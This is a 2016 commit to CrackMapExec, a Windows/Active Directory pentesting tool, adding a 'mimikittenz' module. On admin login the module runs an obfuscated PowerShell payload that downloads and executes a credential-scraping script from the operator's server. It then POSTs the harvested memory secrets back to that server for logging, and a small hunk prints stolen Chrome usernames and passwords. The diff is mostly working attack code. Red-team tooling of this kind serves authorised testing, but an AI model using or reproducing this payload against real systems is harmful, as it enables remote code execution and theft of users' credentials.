Added the mimikittenz module

byt3bl33d3r · byt3bl33d3r · commit 9af1ab56cfc2 · 2016-08-01T02:23:17.000-06:00
- Removed the mem_scraper module since the new mimikittenz module should
  replace its functionalitu

- Fixed newline in enum_chrome output
- Version Bump
diff --git a/.gitmodules b/.gitmodules
@@ -1,3 +1,6 @@
 [submodule "cme/data/PowerSploit"]
 	path = cme/data/PowerSploit
 	url = https://github.com/PowerShellMafia/PowerSploit
+[submodule "cme/data/mimikittenz"]
+	path = cme/data/mimikittenz
+	url = https://github.com/putterpanda/mimikittenz
diff --git a/cme/data/mem_scraper.ps1 b/cme/data/mem_scraper.ps1
diff --git a/cme/data/mimikittenz b/cme/data/mimikittenz
@@ -0,0 +1 @@
+Subproject commit f78678a86dd5de4f764d62b362630e6aabae1506
diff --git a/cme/modules/enum_chrome.py b/cme/modules/enum_chrome.py
@@ -117,7 +117,7 @@ def on_response(self, context, response):
                     context.log.highlight('URL: ' + cred['url'])
                     context.log.highlight('Username: ' + cred['user'])
                     context.log.highlight('Password: ' + cred['passw'])
-                    context.log.highlight('\n')
+                    context.log.highlight('')
 
             log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
             write_log(data, log_name)
diff --git a/cme/modules/mem_scraper.py b/cme/modules/mem_scraper.py
diff --git a/cme/modules/mimikittenz.py b/cme/modules/mimikittenz.py
@@ -0,0 +1,77 @@
+from cme.helpers import create_ps_command, obfs_ps_script, get_ps_script, write_log, gen_random_string
+from StringIO import StringIO
+from datetime import datetime
+from sys import exit
+
+class CMEModule:
+    '''
+        Executes the Mimikittenz script
+        Module by @byt3bl33d3r
+    '''
+
+    name = 'mimikittenz'
+
+    description = "Executes Mimikittenz"
+
+    def options(self, context, module_options):
+        '''
+        '''
+
+        self.obfs_name = gen_random_string()
+
+    def on_admin_login(self, context, connection):
+
+        payload = '''
+        IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-mimikittenz.ps1');
+        $data = Invoke-{command};
+        $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
+        $request.Method = 'POST';
+        $request.ContentType = 'application/x-www-form-urlencoded';
+        $bytes = [System.Text.Encoding]::ASCII.GetBytes($data);
+        $request.ContentLength = $bytes.Length;
+        $requestStream = $request.GetRequestStream();
+        $requestStream.Write( $bytes, 0, $bytes.Length );
+        $requestStream.Close();
+        $request.GetResponse();'''.format(server=context.server, 
+                                          port=context.server_port, 
+                                          addr=context.localip,
+                                          command=self.obfs_name)
+
+        context.log.debug('Payload: {}'.format(payload))
+        payload = create_ps_command(payload)
+        connection.execute(payload)
+        context.log.success('Executed payload')
+
+    def on_request(self, context, request):
+        if 'Invoke-mimikittenz.ps1' == request.path[1:]:
+            request.send_response(200)
+            request.end_headers()
+
+            with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
+                ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
+                request.wfile.write(ps_script)
+
+        else:
+            request.send_response(404)
+            request.end_headers()
+
+    def on_response(self, context, response):
+        response.send_response(200)
+        response.end_headers()
+        length = int(response.headers.getheader('content-length'))
+        data = response.rfile.read(length)
+
+        #We've received the response, stop tracking this host
+        response.stop_tracking_host()
+
+        if len(data):
+            def print_post_data(data):
+                buf = StringIO(data.strip()).readlines()
+                for line in buf:
+                    context.log.highlight(line.strip())
+
+            print_post_data(data)
+
+            log_name = 'MimiKittenz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
+            write_log(data, log_name)
+            context.log.info("Saved output to {}".format(log_name))
diff --git a/setup.py b/setup.py
@@ -1,7 +1,7 @@
 from setuptools import setup, find_packages
 
 setup(name='crackmapexec',
-    version='3.1.2',
+    version='3.1.3',
     description='A swiss army knife for pentesting Windows/Active Directory environments',
     classifiers=[
         'License :: OSI Approved :: BSD License',
